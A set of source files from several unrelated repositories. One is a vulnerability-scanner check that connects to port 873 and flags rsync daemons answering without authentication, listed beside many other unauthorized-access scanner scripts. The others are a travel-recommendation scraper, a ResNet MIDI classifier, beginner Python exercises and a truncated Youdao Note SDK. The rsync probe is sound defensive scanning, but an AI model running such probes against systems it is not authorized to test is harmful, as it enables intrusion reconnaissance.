--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# rsync 未授权访问
import socket
from lib.common.utils import save_script_result
ports_to_check = 873  # default port probed; the scanner verifies it is open

def do_check(self, url):
    """Report rsync daemons that present their banner without authentication."""
    if url != '/':
        return
    port = 873
    # A detected non-standard rsync port skips the open-port precondition.
    if self.scheme == 'rsync' and self.port != 873:
        port = self.port
    elif 873 not in self.ports_open:
        return
    socket.setdefaulttimeout(5)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((self.host, port))
        s.send(bytes("", 'UTF-8'))
        result = s.recv(1024).decode()
        if "RSYNCD" in result:
            save_script_result(self, '', 'rsync://%s:%s' % (self.host, port), 'Rsync Unauthorized Access')
    except Exception:
        pass
    finally:
        # Fixed: the original closed the socket only on error, leaking it on success.
        s.close()
|
[
"/SScan.py",
"/lib/common/common.py",
"/lib/common/connectionPool.py",
"/lib/common/scanner.py",
"/lib/common/utils.py",
"/lib/config/__init__.py",
"/lib/config/banner.py",
"/lib/config/data.py",
"/lib/config/log.py",
"/lib/module/PortScan.py",
"/lib/module/__init__.py",
"/lib/module/fofa.py",
"/lib/module/iscdn.py",
"/lib/module/proxy.py",
"/pocs/scripts/mysql_Empty_pwd.py",
"/pocs/scripts/tools/PortScan.py",
"/pocs/scripts/unauthorized_access_CouchDB.py",
"/pocs/scripts/unauthorized_access_Hadoop.py",
"/pocs/scripts/unauthorized_access_Hadoop_yarn.py",
"/pocs/scripts/unauthorized_access_docker.py",
"/pocs/scripts/unauthorized_access_docker_registry_api.py",
"/pocs/scripts/unauthorized_access_elasticsearch.py",
"/pocs/scripts/unauthorized_access_ftp.py",
"/pocs/scripts/unauthorized_access_jboss.py",
"/pocs/scripts/unauthorized_access_jenkins.py",
"/pocs/scripts/unauthorized_access_memcached.py",
"/pocs/scripts/unauthorized_access_postgresb.py",
"/pocs/scripts/unauthorized_access_rsync.py"
] |
02iceskate/Travel-Inspiration
|
import scrapy
from ..items import CountryItem
from scrapy.loader import ItemLoader
from bs4 import BeautifulSoup
class CitiesSpider(scrapy.Spider):
    """Scrape city names from the Zomato directory page."""
    name = "zomato"
    start_urls= ['https://www.zomato.com/directory']

    def parse(self, response):
        # Parse with BeautifulSoup: the city links are easiest to target
        # with the ".row h2 > a" CSS selector.
        document = BeautifulSoup(response.text, 'html5lib')
        for anchor in document.select(".row h2 > a"):
            yield {"name": anchor.text}
--- FILE SEPARATOR ---
import requests
import numpy as np
import pandas as pd
import json
from requests_futures.sessions import FuturesSession
from titlecase import titlecase
from location import location_id
# Load the list of cities the API provider supports.
with open('./data_city.json', 'r') as myfile:
    data = myfile.read()
obj = json.loads(data)
cities = [obj[i].get('name').rstrip().lower() for i in range(0, len(obj))]
popularity_index = []
nightlife_indices = []
countries = []
session = FuturesSession(max_workers=16)

# The csv below was produced by a one-off indexing run; it only covers the
# first 250 cities because of the API's daily request limit.
# NOTE(review): the Windows-style relative path will fail on other platforms.
df_csv = pd.read_csv('..\\Tech Challenge\\city_index.csv')

# Ask the client for preferences.
popular_marks = float(input("Please input the popularity you prefer: (5 is the highest)"))
nightlife_marks = float(input("Please input the nightlife index you prefer: (5 is the highest)"))

# Weight whichever preference scored higher at 70/30 (50/50 on a tie).
if popular_marks > nightlife_marks:
    calculation = popular_marks*0.7 + nightlife_marks*0.3
elif popular_marks == nightlife_marks:
    calculation = popular_marks*0.5 + nightlife_marks*0.5
else:
    calculation = popular_marks*0.3 + nightlife_marks*0.7

df_csv['Difference'] = abs(df_csv['Average'] - calculation)

# Fixed: the original recomputed nsmallest(10) plus the popularity filter six
# times; compute the candidate table once and take the first three rows.
top = df_csv.nsmallest(10, 'Difference')
candidates = top[top['Popularity_index'] > 3.5].values.tolist()
first_suggestion_country, first_suggestion_city = candidates[0][0], candidates[0][1]
second_suggestion_country, second_suggestion_city = candidates[1][0], candidates[1][1]
third_suggestion_country, third_suggestion_city = candidates[2][0], candidates[2][1]

print("\n1st suggested location: "+"\nCountry: "+first_suggestion_country+"\nCity: "+titlecase(first_suggestion_city))
print("\n2nd suggested location: "+"\nCountry: "+second_suggestion_country+"\nCity: "+titlecase(second_suggestion_city))
print("\n3rd suggested location: "+"\nCountry: "+third_suggestion_country+"\nCity: "+titlecase(third_suggestion_city))
--- FILE SEPARATOR ---
import requests
import json
import os
# Retrieve info from Zomato.  The API key is read from the USER-KEY
# environment variable and sent on every request via the user-key header.
user_key = os.environ.get('USER-KEY')
headers = {"Accept": "application/json",
           "user-key": user_key}
def location_id(session, city):
    """Return (country_name, popularity, nightlife_index) for *city* via the Zomato API."""
    url = 'https://developers.zomato.com/api/v2.1/locations?query=' + city
    payload = {"query": city, "count": 1}
    global headers
    response = requests.post(url, data=payload, headers=headers)
    suggestion = json.loads(response.text).get('location_suggestions')[0]
    entity_id = suggestion.get('entity_id')      # the location id
    entity_type = suggestion.get('entity_type')  # 'city' or 'country'
    country_name = suggestion.get('country_name')

    def location_details(entity_id, entity_type):
        # Fetch the popularity/nightlife indices for one location entity.
        url = ('https://developers.zomato.com/api/v2.1/location_details?entity_id='
               + str(entity_id) + '&entity_type=' + entity_type)
        data_loc = {"entity_id": entity_id, "entity_type": entity_type}
        res_loc = requests.post(url, data=data_loc, headers=headers)
        details = json.loads(res_loc.text)
        return (details.get('popularity'), details.get('nightlife_index'))

    popularity, nightlife_index = location_details(entity_id, entity_type)
    return (country_name, popularity, nightlife_index)
--- FILE SEPARATOR ---
import requests
import numpy as np
import json
import os
# Retrieve info from the Sygic travel site; the API key comes from the
# X-API-KEY environment variable.
X = os.environ.get('X-API-KEY')
# Fixed: the header name contained a trailing space ("x-api-key ") and the
# dict was assigned twice ("headers = headers = ..."); header names with
# spaces are rejected by requests, so authentication could never succeed.
headers = {"x-api-key": X}
def location_id(location):
    """Return (city_id, country_id) for *location* from the Sygic places API."""
    url_place = 'https://api.sygictravelapi.com/1.1/en/places/list?limit=1&query=' + location
    global headers
    response = requests.get(url_place, headers=headers)
    payload = json.loads(response.content)
    first_place = payload.get('data').get('places')[0]
    city_id = first_place.get('id')
    # The parent ids mix several entity kinds; keep only the country one.
    country_ids = [pid for pid in first_place.get('parent_ids') if pid[0:7] == 'country']
    return city_id, country_ids[0]
def places(place_id):
    """Group POI names from *place_id*'s first collection by activity category."""
    url_collection = 'https://api.sygictravelapi.com/1.1/en/collections'
    global headers
    grouped = {'sightseeing': [], 'hiking': [], 'eating': [], 'discovering': [], 'going_out': [],
               'playing': [], 'relaxing': [], 'shopping': [], 'sleeping': [], 'doing_sports': [],
               'traveling': []}
    params = {'parent_place_id': place_id}
    req_collection = requests.get(url_collection, headers=headers, params=params)
    payload = json.loads(req_collection.content)
    poi_ids = payload.get('data').get('collections')[0].get('place_ids')
    for poi_id in poi_ids:
        poi_name, categories = place_poi(poi_id=poi_id)
        # A POI may belong to several categories; record it under each known one.
        for category in categories:
            if category in grouped:
                grouped[category].append(poi_name)
    return grouped
def place_poi(poi_id):
    """Return (name, categories) for the POI with id *poi_id* from the Sygic API."""
    url_place = 'https://api.sygictravelapi.com/1.1/en/places/' + str(poi_id)
    global headers
    response = requests.get(url_place, headers=headers)
    # Fixed: the original decoded the JSON body twice; parse it once.
    place = json.loads(response.content).get('data').get('place')
    return place.get('name'), place.get('categories')
--- FILE SEPARATOR ---
import requests
import numpy as np
import json
from places_f import location_id, places
# Retrieve recommended places from the Sygic travel site for each city.
cities = ['london', 'osaka']  # stand-in for the cities produced by location.py
cities_id = []
countries_id = []
for city in cities:
    # Resolve the city's Sygic id first, then fetch its recommended places.
    city_id, country_id = location_id(city)
    recommendations = places(place_id=city_id)
    print(city.upper())
    print('The followings are recommended:')
    print(recommendations)
--- FILE SEPARATOR ---
import os

# Quick sanity check: print the configured Sygic API key (None if unset).
X = os.environ.get('X-API-KEY')
print(X)
|
[
"/country_scrapy/country/spiders/cities.py",
"/inspiration.py",
"/location.py",
"/places_f.py",
"/places_from_inspiration.py",
"/testing.py"
] |
02w/ResNet-for-TSC
|
import os
import joblib
import muspy
import torch
import random
from pytorch_lightning import LightningDataModule
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import scale
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import Dataset, DataLoader
class RawDataset(object):
    """Reads a directory of MIDI files (one subdirectory per class label) and
    converts each file's longest track into a note-based representation.

    Files are split per label into train/dev/test (64%/16%/20%) with fixed
    random seeds, so the split is reproducible across runs.
    """
    def __init__(self, path, shuffle=True):
        self.path = path
        self.files = []        # all files, relative to `path` (label/filename)
        self.train_files = []
        self.dev_files = []
        self.test_files = []
        self.train_data = []   # list of (note_representation, label) pairs
        self.dev_data = []
        self.test_data = []
        self.labels = []       # class labels = subdirectory names
        self.shuffle = shuffle
        self.get_filenames()
        self.read_data()

    def get_filenames(self):
        """Collect per-label file lists and split them into train/dev/test."""
        self.labels = os.listdir(self.path)
        for d in self.labels:
            files = os.listdir(os.path.join(self.path, d))
            # Split per label so every class keeps the same 64/16/20 ratio.
            train, test = train_test_split(files, test_size=0.2, random_state=17)
            train, dev = train_test_split(train, test_size=0.2, random_state=17)
            self.files.extend([os.path.join(d, i) for i in files])
            self.train_files.extend([os.path.join(d, i) for i in train])
            self.dev_files.extend([os.path.join(d, i) for i in dev])
            self.test_files.extend([os.path.join(d, i) for i in test])
        if self.shuffle:
            random.shuffle(self.train_files)
            random.shuffle(self.dev_files)
            random.shuffle(self.test_files)

    def read_data(self):
        """Parse every MIDI file into a (note_representation, label) tuple."""
        filename_lists = [self.train_files, self.dev_files, self.test_files]
        data_lists = [self.train_data, self.dev_data, self.test_data]
        for files, data in zip(filename_lists, data_lists):
            for midi in files:
                # The label is the subdirectory component of the relative path.
                label = os.path.split(midi)[0]
                try:
                    music = muspy.read_midi(os.path.join(self.path, midi))
                    # choose the longest track
                    track_len = [len(i) for i in music.tracks]
                    track = music.tracks[track_len.index(max(track_len))]
                    # Note-based representation:
                    # (time, pitch, duration, velocity) for each note, used as 4 channels in ResNet
                    rep = muspy.Music(resolution=music.resolution, tracks=[track]).to_note_representation()
                    data.append((rep, label))
                except Exception as e:
                    # Unreadable or corrupt MIDI files are reported and skipped.
                    print(f'Failed to read file {midi}!')
                    print(e)

    def save(self, filename='data.joblib'):
        """Serialize the whole dataset object to disk with joblib."""
        joblib.dump(self, filename)

    @staticmethod
    def load(filename='data.joblib'):
        """Deserialize a RawDataset previously written by save()."""
        return joblib.load(filename)
class TorchDataset(Dataset):
    """Thin torch Dataset wrapping parallel label/input sequences."""

    def __init__(self, labels, inputs):
        self.labels = labels
        self.inputs = inputs

    def __getitem__(self, item):
        label = torch.tensor(self.labels[item])
        # inputs are handed to the model as float tensors
        sample = torch.tensor(self.inputs[item]).float()
        return label, sample

    def __len__(self):
        return len(self.inputs)
def collate_fn(data):
    """Collate (label, input) pairs into one padded batch.

    Returns (labels, inputs) where inputs has shape (Batch, Channels, Length).
    """
    label_list = [label for label, _ in data]
    input_list = [sample for _, sample in data]
    batch_labels = torch.tensor(label_list)
    # pad variable-length sequences, then move channels in front of length
    batch_inputs = pad_sequence(input_list, batch_first=True).transpose(1, 2)
    return batch_labels, batch_inputs
class DataModule(LightningDataModule):
    """LightningDataModule wrapping RawDataset; serves padded (label, input) batches."""

    def __init__(self, path, batch_size):
        super().__init__()
        self.path = path
        # fixed attribute typo: was `self.bath_size`
        self.batch_size = batch_size
        self.data: RawDataset = None
        self.train_dataset: TorchDataset = None
        self.dev_dataset: TorchDataset = None
        self.test_dataset: TorchDataset = None

    def prepare_data(self):
        """Load the cached dataset if present, otherwise build and cache it."""
        cache = f'{self.path}.joblib'
        if os.path.exists(cache):
            self.data = RawDataset.load(cache)
            # message typo fixed: was "exsiting"
            print(f'Loaded data from existing file({cache})! If the dataset has been changed, DELETE this file!')
        else:
            self.data = RawDataset(self.path, shuffle=True)
            self.data.save(cache)

    def setup(self, stage=None):
        """Build train/dev/test TorchDatasets with numeric labels and per-sample scaling."""
        self.train_dataset, self.dev_dataset, self.test_dataset = (
            TorchDataset(
                # string label -> numeric label (index into self.data.labels)
                labels=[self.data.labels.index(i[1]) for i in d],
                # scale per sample
                inputs=[scale(i[0]) for i in d]
            ) for d in [self.data.train_data, self.data.dev_data, self.data.test_data])

    def _loader(self, dataset, shuffle):
        # shared DataLoader construction for the three splits
        return DataLoader(
            dataset=dataset,
            batch_size=self.batch_size,
            collate_fn=collate_fn,
            shuffle=shuffle
        )

    def train_dataloader(self):
        return self._loader(self.train_dataset, shuffle=True)

    def val_dataloader(self):
        return self._loader(self.dev_dataset, shuffle=False)

    def test_dataloader(self):
        return self._loader(self.test_dataset, shuffle=False)
--- FILE SEPARATOR ---
import torch.nn as nn
import torch.nn.functional as F
def same_conv1d(in_channels, n_feature_maps, kernel_size):
    """1-D convolution whose output length equals its input length.

    Odd kernels use Conv1d's symmetric padding; even kernels need one fewer
    pad element on the left, which Conv1d cannot express, so an explicit
    ConstantPad1d layer is prepended instead.
    """
    half = kernel_size // 2
    if kernel_size % 2 == 0:
        pad = nn.ConstantPad1d((half - 1, half), 0)
        conv = nn.Conv1d(in_channels, n_feature_maps, kernel_size=kernel_size)
        return nn.Sequential(pad, conv)
    return nn.Conv1d(in_channels, n_feature_maps, kernel_size, padding=half)
def block(in_channels, n_feature_maps, kernel):
    """Three length-preserving conv+batch-norm layers; ReLU after the first
    two only — the caller adds the residual connection before applying the
    final activation."""
    layers = [
        same_conv1d(in_channels, n_feature_maps, kernel[0]),
        nn.BatchNorm1d(n_feature_maps),
        nn.ReLU(inplace=True),
        same_conv1d(n_feature_maps, n_feature_maps, kernel[1]),
        nn.BatchNorm1d(n_feature_maps),
        nn.ReLU(inplace=True),
        same_conv1d(n_feature_maps, n_feature_maps, kernel[2]),
        nn.BatchNorm1d(n_feature_maps),
    ]
    return nn.Sequential(*layers)
def shortcut(in_channels, n_feature_maps):
    """1x1 conv + batch norm: matches channel counts on the residual path."""
    projection = nn.Conv1d(in_channels, n_feature_maps, kernel_size=1)
    return nn.Sequential(projection, nn.BatchNorm1d(n_feature_maps))
class ResNet(nn.Module):
    """Three-stage 1-D ResNet for time-series classification.

    Feature maps widen 1x -> 2x -> 2x across the stages; each stage adds a
    residual connection (a 1x1 projection where channel counts differ),
    followed by global average pooling and a linear classifier that emits
    log-probabilities.
    """

    def __init__(self, in_channels, n_feature_maps, n_classes, kernel_size: list):
        super().__init__()
        assert len(kernel_size) == 3
        self.in_channels = in_channels
        self.n_feature_maps = n_feature_maps
        self.n_classes = n_classes
        self.kernel_size = kernel_size
        wide = 2 * n_feature_maps
        # stage 1: in_channels -> n_feature_maps
        self.conv1 = block(in_channels, n_feature_maps, kernel_size)
        self.shortcut1 = shortcut(in_channels, n_feature_maps)
        self.activation1 = nn.ReLU(inplace=True)
        # stage 2: n_feature_maps -> 2 * n_feature_maps
        self.conv2 = block(n_feature_maps, wide, kernel_size)
        self.shortcut2 = shortcut(n_feature_maps, wide)
        self.activation2 = nn.ReLU(inplace=True)
        # stage 3: channel count unchanged, so the residual path is just a norm
        self.conv3 = block(wide, wide, kernel_size)
        self.shortcut3 = nn.BatchNorm1d(wide)
        self.activation3 = nn.ReLU(inplace=True)
        # global avg pooling over the length dimension
        self.gap = nn.AdaptiveAvgPool1d(1)
        self.fc = nn.Linear(wide, n_classes)

    def forward(self, x):
        h = self.activation1(self.conv1(x) + self.shortcut1(x))
        h = self.activation2(self.conv2(h) + self.shortcut2(h))
        h = self.activation3(self.conv3(h) + self.shortcut3(h))
        pooled = self.gap(h).squeeze(2)
        return F.log_softmax(self.fc(pooled), dim=-1)
--- FILE SEPARATOR ---
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import torch.optim as optim
from torchmetrics.functional import accuracy, f1
from resnet import ResNet
class ResNetRunner(pl.LightningModule):
    """LightningModule that trains and evaluates the ResNet classifier."""

    def __init__(self, in_channels, n_feature_maps, n_classes, kernel_size: list, lr=5e-4):
        super().__init__()
        # stores all constructor args into self.hparams (and into checkpoints)
        self.save_hyperparameters()
        self.model = ResNet(self.hparams.in_channels, self.hparams.n_feature_maps, self.hparams.n_classes, self.hparams.kernel_size)
        # example data (Batch = 1, Channels, Length = 10)
        self.example_input_array = torch.rand(1, self.hparams.in_channels, 10, device=self.device)

    def forward(self, x):
        return self.model.forward(x)

    def configure_optimizers(self):
        optimizer = optim.Adam(self.parameters(), lr=self.hparams.lr)
        return {
            'optimizer': optimizer,
            # plateau scheduler keyed on the validation loss logged below
            'lr_scheduler': optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.3, patience=30, min_lr=1e-4),
            'monitor': 'Validation step loss'
        }

    def training_step(self, batch, batch_idx):
        # batches arrive as (labels, inputs) — see collate_fn in dataset.py
        y, x = batch
        output = self.model.forward(x)
        loss = F.nll_loss(output, y)
        self.log('Train step loss', loss, on_epoch=True, on_step=False)
        return loss

    def _evaluate(self, x):
        # switch to eval mode so batch norm uses running statistics
        self.eval()
        output = self.model.forward(x)
        pred = torch.argmax(output, dim=-1)
        return pred, output

    def validation_step(self, batch, batch_idx):
        y, x = batch
        pred, output = self._evaluate(x)
        loss = F.nll_loss(output, y)
        dev_acc = accuracy(pred, y)
        # NOTE(review): `f1` is an older torchmetrics.functional name (later
        # versions renamed it `f1_score`) — pin the torchmetrics version.
        dev_f1 = f1(pred, y, num_classes=self.hparams.n_classes)
        self.log('Validation step loss', loss)
        self.log('Validation Acc', dev_acc)
        self.log('Validation F1', dev_f1)
        return loss

    @torch.no_grad()
    def predict(self, x: list) -> list:
        """
        Get prediction for samples.
        :param x: a list of ndarrays with size (channel, length)
        :return: a list of labels
        """
        assert type(x) is list
        ret = []
        for i in x:
            assert i.shape[0] == self.hparams.in_channels and i.ndim == 2
            # add a batch dimension of 1 and predict one sample at a time
            sample = torch.tensor(i).unsqueeze(0).float()
            pred, _ = self._evaluate(sample)
            ret.append(int(pred.item()))
        return ret
--- FILE SEPARATOR ---
import pytorch_lightning as pl
from pytorch_lightning.callbacks import ModelCheckpoint, LearningRateMonitor
from sklearn.metrics import classification_report
from sklearn.preprocessing import scale
from dataset import DataModule, RawDataset
from runner import ResNetRunner
def train():
    """Train the ResNet on the `midis` dataset; return (model, best checkpoint path)."""
    print('Training...')
    dm = DataModule('midis', batch_size=10)
    # 4 input channels = (time, pitch, duration, velocity) note representation
    model = ResNetRunner(
        in_channels=4,
        n_feature_maps=64,
        n_classes=2,
        kernel_size=[8, 5, 3]
    )
    # keep the 20 best checkpoints by validation F1, plus the last epoch
    checkpoint = ModelCheckpoint(
        dirpath='versions/swa2/checkpoints',
        monitor='Validation F1',
        mode='max',
        save_top_k=20,
        save_last=True
    )
    lr_monitor = LearningRateMonitor(logging_interval='epoch')
    # NOTE(review): `stochastic_weight_avg` / `weights_summary` / `gpus` are
    # pytorch-lightning 1.x Trainer args removed in 2.x — pin the version.
    trainer = pl.Trainer(
        max_epochs=150,
        callbacks=[checkpoint, lr_monitor],
        stochastic_weight_avg=True,
        gpus=1,
        weights_summary='full'
    )
    trainer.fit(model, dm)
    # save best_k_models to a yaml file
    checkpoint.to_yaml()
    return model, checkpoint.best_model_path
def test(model=None, use_ckpt=False):
    """Evaluate a model on the held-out test split and print a classification report.

    When use_ckpt is True, `model` is interpreted as a checkpoint path and
    loaded first; otherwise it must be a trained ResNetRunner instance.
    """
    print('Testing...')
    data = RawDataset.load('midis.joblib')
    if use_ckpt:
        print(model)
        model = ResNetRunner.load_from_checkpoint(model)
    # scale per sample and transpose to (channels, length) as predict() expects
    samples = [scale(rep).T for rep, _ in data.test_data]
    predictions = model.predict(samples)
    gold = [label for _, label in data.test_data]
    predicted_labels = [data.labels[p] for p in predictions]
    print(classification_report(gold, predicted_labels))
def export(model=None, use_ckpt=False, save='model.pt'):
    """Trace the model to TorchScript, write it to `save`, and return the script.

    When use_ckpt is True, `model` is a checkpoint path that is loaded first.
    """
    if use_ckpt:
        print(model)
        model = ResNetRunner.load_from_checkpoint(model)
    return model.to_torchscript(save, method='trace')
if __name__ == '__main__':
    # fixed seed for reproducible splits/initialization
    pl.seed_everything(17)
    model, best_path = train()
    # evaluate the in-memory model, the best checkpoint from this run, and a
    # few hand-picked checkpoints from earlier experiment runs
    test(model)
    test(model=best_path, use_ckpt=True)
    test(model='versions/swa/checkpoints/last.ckpt', use_ckpt=True)
    test(model='versions/swa/checkpoints/epoch=99-step=1899.ckpt', use_ckpt=True)
    test(model='versions/checkpoints/epoch=59-step=1139.ckpt', use_ckpt=True)
    export(model='versions/swa/checkpoints/epoch=99-step=1899.ckpt', use_ckpt=True, save='swa99.pt')
    # model = torch.jit.load('model.pt')
|
[
"/dataset.py",
"/resnet.py",
"/runner.py",
"/train.py"
] |
031205/Wave-3
|
from math import sqrt
def HypotenuseCalculator(a,b):
    """Return the hypotenuse of a right triangle whose legs are a and b."""
    return sqrt(a ** 2 + b ** 2)
# Interactive driver: read the two legs, validate them, print the hypotenuse.
side1 = input('Input the length of the first shorter side of a triangle: ')
side1 = float(side1)
side2 = input('Input the length of the second shorter side of a triangle: ')
side2 = float(side2)
if side1 > 0 and side2 > 0:
    hypotenuse = HypotenuseCalculator(side1,side2)
    print('The length of the hypotenuse of this triangle is',hypotenuse)
else:
    # non-positive side lengths are rejected
    print('Invalid input')
--- FILE SEPARATOR ---
def Shipping_Calculator(num):
    """Shipping charge: $10.95 for the first item plus $2.95 per additional item."""
    extra_items = num - 1
    return 10.95 + extra_items * 2.95
# Interactive driver: read the item count, validate it, print the charge.
item_num = input('Enter the number of items in the order: ')
item_num = int(item_num)
if item_num > 0:
    shipping_charge = Shipping_Calculator(item_num)
    print('The shipping charge of your order is $',round(shipping_charge,2),sep='')
else:
    # fixed message typo: was 'Ivalid Input'
    print('Invalid Input')
--- FILE SEPARATOR ---
def PrimeNumberIndicator(a):
    """Return True if `a` is prime, False otherwise (numbers below 2 are not prime).

    Trial division only needs to test candidate divisors up to sqrt(a):
    any factor above sqrt(a) pairs with one below it. The original tested
    every value up to a-1, which is O(a) instead of O(sqrt(a)).
    """
    if a < 2:
        return False
    for i in range(2, int(a ** 0.5) + 1):
        if a % i == 0:
            return False
    return True
--- FILE SEPARATOR ---
from Exercise92 import PrimeNumberIndicator
# Interactive driver: classify the entered integer as prime or not.
num = input('Input an integer number: ')
num = int(num)
b = PrimeNumberIndicator(num)
# PrimeNumberIndicator always returns a bool, so a plain truth test replaces
# the original `is True` / `is False` identity checks
if b:
    print('It is a prime number.')
else:
    print('It is not a prime number.')
--- FILE SEPARATOR ---
# Print the prime factorisation of an integer >= 2.
n = input('Enter an integer (2 or greater): ')
n = int(n)
if n >= 2:
    print('The prime factors of',n,'are:')
    factor_list = []
    factor = 2
    while factor <= n:
        if n % factor == 0:
            # integer division: the original `n = n / factor` turned n into a
            # float, which loses exactness for large inputs and makes the
            # `factor <= n` comparison operate on floats
            n = n // factor
            factor_list.append(factor)
        else:
            factor = factor + 1
    for i in factor_list:
        print(i)
else:
    print('This number is invalid.')
|
[
"/Exercise81.py",
"/Exercise83.py",
"/Exercise92.py",
"/Exercise92Main.py",
"/prime factors.py"
] |
0312birdzhang/youdaonotepy
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 demo script: walks through the whole YNote API surface
# (OAuth handshake, user info, notebooks, notes, resources).
import ynote
import webbrowser
import os.path
import ynote.oauth2 as oauth2
# fill in the credentials issued for your application
consumer_key = 'your consumer key'
consumer_secret = 'your consumer secret'
token_file = 'demo.token'
client = ynote.YNoteClient(consumer_key, consumer_secret)
if os.path.exists(token_file):
    # reuse a cached access token: key on line 1, secret on line 2
    f = open(token_file)
    client.access_token = oauth2.Token(f.readline().strip(), f.readline().strip())
    f.close()
else:
    # interactive OAuth dance: open the authorization URL in a browser,
    # read the verifier back from the user, then cache the granted token
    auth_url = client.grant_request_token(None)
    print 'auth_url = '+auth_url
    webbrowser.open(auth_url)
    verifier = raw_input('Input verifier:')
    client.grant_access_token(verifier)
    print 'access_token=%s, secret=%s' % (client.access_token.key, client.access_token.secret)
    f = open(token_file, 'w')
    f.write(client.access_token.key+"\n"+client.access_token.secret)
    f.close()
print '\get user info\n---------------------------'
user = client.get_user()
print user.__dict__
print '\nget notebooks\n----------------------------'
books = client.get_notebooks()
print books
print '\nget notes in the default notebook\n-----------------------'
note_paths = client.get_note_paths(user.default_notebook)
print note_paths
print '\ncreate notebook\n------------------------'
bookpath = client.create_notebook('book1')
print 'new_book_path='+bookpath
print '\nget note\n----------------------'
note = client.get_note(note_paths[0])
print note.__dict__
print '\ncreate note\n---------------------'
new_note = ynote.Note()
new_note.source = u'lic'
new_note.author = u'lichuan'
new_note.title = u'我是谁?'
new_note.content = u'hehe哈哈哈'
new_note.path = client.create_note(user.default_notebook, new_note)
print "new_note_path="+new_note.path
#pdb.set_trace()
#print '\ncreate incomplete note\n---------------------'
#new_note = ynote.Note()
#new_note.source = None
#new_note.author = u'lichuan'
#new_note.title = u'我是谁?'
#new_note.content = u'hehe哈哈哈'
#new_note.path = client.create_note(user.default_notebook, new_note)
#print "new_note_path="+new_note.path
print '\nupdate note\n--------------------'
new_note.content += u" updated"
client.update_note(new_note)
print '\nmove note\n-------------------'
new_note.path = client.move_note(new_note.path, bookpath)
print 'new_path='+ new_note.path
print '\nshare note\n----------------------'
shared_url = client.share_note(new_note.path)
print 'shared_url='+shared_url
print '\nupload image\n-------------------'
# upload a local image, then embed its tag into the note content
res_file = open('demo_upload.jpg')
res = client.upload_resource(res_file)
res_file.close()
print res.to_resource_tag()
print '\nupdate note with image\n--------------------'
new_note.content += res.to_resource_tag()
client.update_note(new_note)
print '\ndownload image\n--------------------'
image_file = open('demo_download.jpg', 'w')
image_file.write(client.download_resource(res.url))
image_file.close()
print '\ndelete note\n---------------------'
# clean up everything created above
client.delete_note(new_note.path)
new_book_notes = client.get_note_paths(bookpath)
print 'new_book_note_paths:',new_book_notes
print '\ndelete notebook\n-----------------'
client.delete_notebook(bookpath)
--- FILE SEPARATOR ---
#!/usr/bin/env python
# Packaging script for the ynote SDK (legacy distutils-based).
from distutils.core import setup
import ynote
# a version string ending in 'b' marks a beta release
if ynote.__version__.endswith('b'):
    dev_status = 'Development Status :: 4 - Beta'
else:
    dev_status = 'Development Status :: 5 - Production/Stable'
kw=dict(name = 'ynote',
        version = ynote.__version__,
        description = 'Youdao Note Python SDK',
        long_description = open('README', 'r').read(),
        author = 'Li Chuan',
        author_email = 'daniellee0219@gmail.com',
        url = 'https://github.com/daniellee219/youdaonotepy',
        download_url = 'https://github.com/daniellee219/youdaonotepy',
        packages = ['ynote'],
        license = 'Apache License, Version 2.0',
        classifiers = [
            dev_status,
            'Environment :: Console',
            'Environment :: Web Environment',
            'Intended Audience :: Developers',
            'License :: OSI Approved :: Apache Software License',
            'Operating System :: OS Independent',
            'Programming Language :: Python',
            'Topic :: Internet',
            'Topic :: Software Development :: Libraries :: Python Modules',
        ])
setup(**kw)
--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__version__ = "1.0b"
__author__ = "Li Chuan (daniellee0219@gmail.com)"
'''
Python client SDK for Youdao Note API using OAuth 2.
'''
try:
import json
except ImportError:
import simplejson as json
import urllib2, oauth2, time
ENCODING = 'utf-8'
# all API calls target the sandbox host; production-host URLs in responses
# are rewritten onto it by _fix_url below
BASE_URL = 'http://sandbox.note.youdao.com/'
OPTIONAL_BASE_URL = 'http://note.youdao.com/'
def _fix_url(url):
    """Rewrite production-host URLs onto the sandbox host (BASE_URL)."""
    if url.startswith(BASE_URL):
        return url
    return url.replace(OPTIONAL_BASE_URL, BASE_URL)
class User:
    """User class that represents a ynote user."""
    def __init__(self, json_dict=None):
        '''init from an API response dictionary, or with empty defaults.'''
        if not json_dict:
            self.id = ""
            self.user_name = ""
            self.total_size = 0
            self.used_size = 0
            self.register_time = 0
            self.last_login_time = 0
            self.last_modify_time = 0
            self.default_notebook = ""
            return
        self.id = json_dict['id']
        self.user_name = json_dict['user']
        self.total_size = json_dict['total_size']
        self.used_size = json_dict['used_size']
        # timestamps are normalized to int
        self.register_time = int(json_dict['register_time'])
        self.last_login_time = int(json_dict['last_login_time'])
        self.last_modify_time = int(json_dict['last_modify_time'])
        self.default_notebook = json_dict['default_notebook']
class Notebook:
    """Notebook class that represents a ynote notebook."""
    def __init__(self, json_dict=None):
        '''init from an API response dictionary, or with empty defaults.'''
        if json_dict:
            self.path = json_dict['path']
            self.name = json_dict['name']
            # counters and timestamps are normalized to int
            for attr in ('notes_num', 'create_time', 'modify_time'):
                setattr(self, attr, int(json_dict[attr]))
        else:
            self.path = ""
            self.name = ""
            self.notes_num = 0
            self.create_time = 0
            self.modify_time = 0
class Note:
    """Note class that represents a ynote note."""
    def __init__(self, json_dict=None):
        '''init from an API response dictionary, or with empty defaults.'''
        if json_dict:
            self.path = json_dict['path']
            self.title = json_dict['title']
            self.author = json_dict['author']
            self.source = json_dict['source']
            self.size = int(json_dict['size'])
            self.create_time = int(json_dict['create_time'])
            self.modify_time = int(json_dict['modify_time'])
            self.content = json_dict['content']
            return
        self.path = ""
        self.title = ""
        self.author = ""
        self.source = ""
        self.size = 0
        # -1 marks "unknown time" for a locally constructed note
        self.create_time = -1
        self.modify_time = -1
        self.content = ""
class Resource:
    """Resource class that represents a resource (e.g. an image) in a note."""
    def __init__(self, json_dict):
        '''init from an API response dictionary.'''
        if not json_dict:
            self.url = ""
            self.icon = ""
            return
        self.url = _fix_url(json_dict['url'])
        # the 'src' thumbnail is optional in the API response
        self.icon = _fix_url(json_dict['src']) if 'src' in json_dict else ""
    def to_resource_tag(self):
        '''convert to an html <img> tag embeddable in note content'''
        if self.icon:
